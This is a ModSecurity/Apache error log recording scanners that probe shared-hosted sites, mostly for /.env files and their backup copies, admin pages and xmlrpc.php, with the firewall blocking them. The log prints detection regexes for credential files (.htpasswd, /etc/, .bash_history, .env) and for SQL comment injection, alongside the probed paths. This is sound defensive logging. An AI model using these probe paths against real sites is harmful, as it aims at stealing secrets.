[Tue May 26 13:03:50.513777 2026] [security2:error] [pid 470766:tid 470986] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM3ujO_W1DqEcFHQ761gAAAFo"]
[Tue May 26 13:03:50.531778 2026] [security2:error] [pid 470766:tid 470769] [remote 185.177.72.30:19294] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/administrator/index.php"] [unique_id "ahVM3ujO_W1DqEcFHQ767wAADgI"]
[Tue May 26 13:03:51.130098 2026] [security2:error] [pid 470766:tid 470898] [client 4.201.75.230:46025] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-signup.php"] [unique_id "ahVM3-jO_W1DqEcFHQ77HAAAAAI"]
[Tue May 26 13:03:51.420275 2026] [security2:error] [pid 470766:tid 470851] [remote 185.177.72.30:19294] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.72.177.185.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "samayikprasanga.in"] [uri "/admin.php"] [unique_id "ahVM3-jO_W1DqEcFHQ77KQAAQ1Q"]
[Tue May 26 13:03:52.335019 2026] [cgid:error] [pid 470766:tid 471015] [client 185.177.72.30:0] AH01264: stderr from /home2/samayikp/public_html/admin.cgi: script not found or unable to stat
[Tue May 26 13:03:53.316631 2026] [security2:error] [pid 470766:tid 470905] [client 14.180.135.165:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM4OjO_W1DqEcFHQ77agAAAAk"]
[Tue May 26 13:03:53.628547 2026] [security2:error] [pid 470766:tid 470991] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM4ejO_W1DqEcFHQ77fgAAAF8"]
[Tue May 26 13:03:53.703272 2026] [security2:error] [pid 470766:tid 470959] [client 4.201.75.230:5275] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/wp-start.php"] [unique_id "ahVM4ejO_W1DqEcFHQ77lwAAAD8"]
[Tue May 26 13:03:54.012948 2026] [security2:error] [pid 470766:tid 470926] [client 157.20.138.61:63233] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVM4ujO_W1DqEcFHQ77sgAAAB4"]
[Tue May 26 13:03:54.013057 2026] [security2:error] [pid 470766:tid 470926] [client 157.20.138.61:63233] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVM4ujO_W1DqEcFHQ77sgAAAB4"]
[Tue May 26 13:03:54.727598 2026] [security2:error] [pid 470766:tid 471006] [client 4.201.75.230:5272] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "triviewsolutions.com"] [uri "/xmlrpc_old.php"] [unique_id "ahVM4ujO_W1DqEcFHQ770QAAAG4"]
[Tue May 26 13:03:55.079774 2026] [autoindex:error] [pid 470766:tid 470923] [client 185.177.72.30:0] AH01276: Cannot serve directory /home2/samayikp/public_html/control/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:03:55.553557 2026] [security2:error] [pid 470766:tid 470943] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM4-jO_W1DqEcFHQ777QAAAC8"]
[Tue May 26 13:03:57.778031 2026] [security2:error] [pid 470766:tid 470959] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78XAAAAD8"]
[Tue May 26 13:03:57.778462 2026] [security2:error] [pid 470766:tid 471007] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78XQAAAG8"]
[Tue May 26 13:03:57.780570 2026] [security2:error] [pid 470766:tid 470835] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env"] [unique_id "ahVM5ejO_W1DqEcFHQ78eQAAAEQ"]
[Tue May 26 13:03:57.781192 2026] [security2:error] [pid 470766:tid 470892] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "vcresco.com"] [uri "/*update.cgi*"] [unique_id "ahVM5ejO_W1DqEcFHQ78fQAAAH0"]
[Tue May 26 13:03:57.782052 2026] [security2:error] [pid 470766:tid 470806] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/backend/.env"] [unique_id "ahVM5ejO_W1DqEcFHQ78fwAAACc"]
[Tue May 26 13:03:57.782201 2026] [security2:error] [pid 470766:tid 470892] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.docker/.env"] [unique_id "ahVM5ejO_W1DqEcFHQ78gQAAAH0"]
[Tue May 26 13:03:57.798156 2026] [security2:error] [pid 470766:tid 470905] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78VwAAAAk"]
[Tue May 26 13:03:57.801340 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78UgAAABA"]
[Tue May 26 13:03:57.804891 2026] [security2:error] [pid 470766:tid 470996] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78WQAAAGQ"]
[Tue May 26 13:03:57.814567 2026] [security2:error] [pid 470766:tid 470896] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78ewAAAHs"]
[Tue May 26 13:03:57.823359 2026] [security2:error] [pid 470766:tid 470952] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78iAAAADg"]
[Tue May 26 13:03:57.825569 2026] [security2:error] [pid 470766:tid 470941] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78igAAAC0"]
[Tue May 26 13:03:57.825708 2026] [security2:error] [pid 470766:tid 471005] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78iwAAAG0"]
[Tue May 26 13:03:58.203087 2026] [security2:error] [pid 470766:tid 470861] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env"] [unique_id "ahVM5ujO_W1DqEcFHQ78qQAAAV4"]
[Tue May 26 13:03:58.203207 2026] [security2:error] [pid 470766:tid 470859] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVM5ujO_W1DqEcFHQ78pgAAAVw"]
[Tue May 26 13:03:58.206313 2026] [security2:error] [pid 470766:tid 470769] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env.bak"] [unique_id "ahVM5ujO_W1DqEcFHQ78rgAAAQI"]
[Tue May 26 13:03:58.206912 2026] [security2:error] [pid 470766:tid 470843] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env.backup"] [unique_id "ahVM5ujO_W1DqEcFHQ78rQAAAUw"]
[Tue May 26 13:03:58.231982 2026] [security2:error] [pid 470766:tid 470897] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78pwAAAVE"]
[Tue May 26 13:03:58.235772 2026] [security2:error] [pid 470766:tid 470897] [client 195.178.110.199:46822] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78pQAAASI"]
[Tue May 26 13:03:58.240671 2026] [security2:error] [pid 470766:tid 470948] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78swAAADQ"]
[Tue May 26 13:03:58.242202 2026] [security2:error] [pid 470766:tid 470918] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78tAAAABY"]
[Tue May 26 13:03:58.243757 2026] [security2:error] [pid 470766:tid 470913] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78tQAAABE"]
[Tue May 26 13:03:58.254863 2026] [security2:error] [pid 470766:tid 471015] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78tgAAAHc"]
[Tue May 26 13:03:58.383774 2026] [security2:error] [pid 470766:tid 470774] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env.old"] [unique_id "ahVM5ujO_W1DqEcFHQ781wAACgc"]
[Tue May 26 13:03:58.399061 2026] [security2:error] [pid 470766:tid 470912] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ780wAAABA"]
[Tue May 26 13:03:58.399608 2026] [security2:error] [pid 470766:tid 470977] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78zQAAAFE"]
[Tue May 26 13:03:58.399641 2026] [security2:error] [pid 470766:tid 471012] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ780AAAAHQ"]
[Tue May 26 13:03:58.400196 2026] [security2:error] [pid 470766:tid 470905] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78zgAAAAk"]
[Tue May 26 13:03:58.404412 2026] [security2:error] [pid 470766:tid 470960] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78ywAAAEA"]
[Tue May 26 13:03:58.408985 2026] [security2:error] [pid 470766:tid 470955] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ781QAAADs"]
[Tue May 26 13:03:58.410310 2026] [security2:error] [pid 470766:tid 471006] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ781AAAAG4"]
[Tue May 26 13:03:58.412293 2026] [security2:error] [pid 470766:tid 470908] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78zwAAAAw"]
[Tue May 26 13:03:58.417328 2026] [security2:error] [pid 470766:tid 470939] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ780gAAACs"]
[Tue May 26 13:03:58.448936 2026] [security2:error] [pid 470766:tid 471014] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ783QAAAHY"]
[Tue May 26 13:03:58.451644 2026] [security2:error] [pid 470766:tid 470995] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ783gAAAGM"]
[Tue May 26 13:03:58.477246 2026] [security2:error] [pid 470766:tid 470949] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVM5ejO_W1DqEcFHQ78lgAAADU"]
[Tue May 26 13:03:58.481613 2026] [security2:error] [pid 470766:tid 470951] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ785AAAADc"]
[Tue May 26 13:03:58.488847 2026] [security2:error] [pid 470766:tid 470965] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ786gAAAEU"]
[Tue May 26 13:03:58.489737 2026] [security2:error] [pid 470766:tid 470969] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ786AAAAEk"]
[Tue May 26 13:03:58.500550 2026] [security2:error] [pid 470766:tid 470854] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 199.110.178.195.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vcresco.com"] [uri "/.env.php"] [unique_id "ahVM5ujO_W1DqEcFHQ784QAAClc"]
[Tue May 26 13:03:58.549745 2026] [security2:error] [pid 470766:tid 470889] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env.swp"] [unique_id "ahVM5ujO_W1DqEcFHQ789AAAJXo"]
[Tue May 26 13:03:58.555002 2026] [security2:error] [pid 470766:tid 470873] [remote 195.178.110.199:46822] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "vcresco.com"] [uri "/.env~"] [unique_id "ahVM5ujO_W1DqEcFHQ78-wAAJWo"]
[Tue May 26 13:03:58.587947 2026] [security2:error] [pid 470766:tid 470943] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78_AAAAC8"]
[Tue May 26 13:03:58.598227 2026] [security2:error] [pid 470766:tid 470948] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78_wAAADQ"]
[Tue May 26 13:03:58.600555 2026] [security2:error] [pid 470766:tid 470944] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78_gAAADA"]
[Tue May 26 13:03:58.608368 2026] [security2:error] [pid 470766:tid 470942] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ78_QAAAC4"]
[Tue May 26 13:03:58.613310 2026] [security2:error] [pid 470766:tid 471011] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79BgAAAHM"]
[Tue May 26 13:03:58.614676 2026] [security2:error] [pid 470766:tid 470966] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79CQAAAEY"]
[Tue May 26 13:03:58.617530 2026] [security2:error] [pid 470766:tid 470968] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79CAAAAEg"]
[Tue May 26 13:03:58.629956 2026] [security2:error] [pid 470766:tid 470923] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79DgAAABs"]
[Tue May 26 13:03:58.643544 2026] [security2:error] [pid 470766:tid 470958] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79EwAAAD4"]
[Tue May 26 13:03:58.650101 2026] [security2:error] [pid 470766:tid 470991] [client 195.178.110.199:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "vcresco.com"] [uri "/index.php"] [unique_id "ahVM5ujO_W1DqEcFHQ79FAAAAF8"]
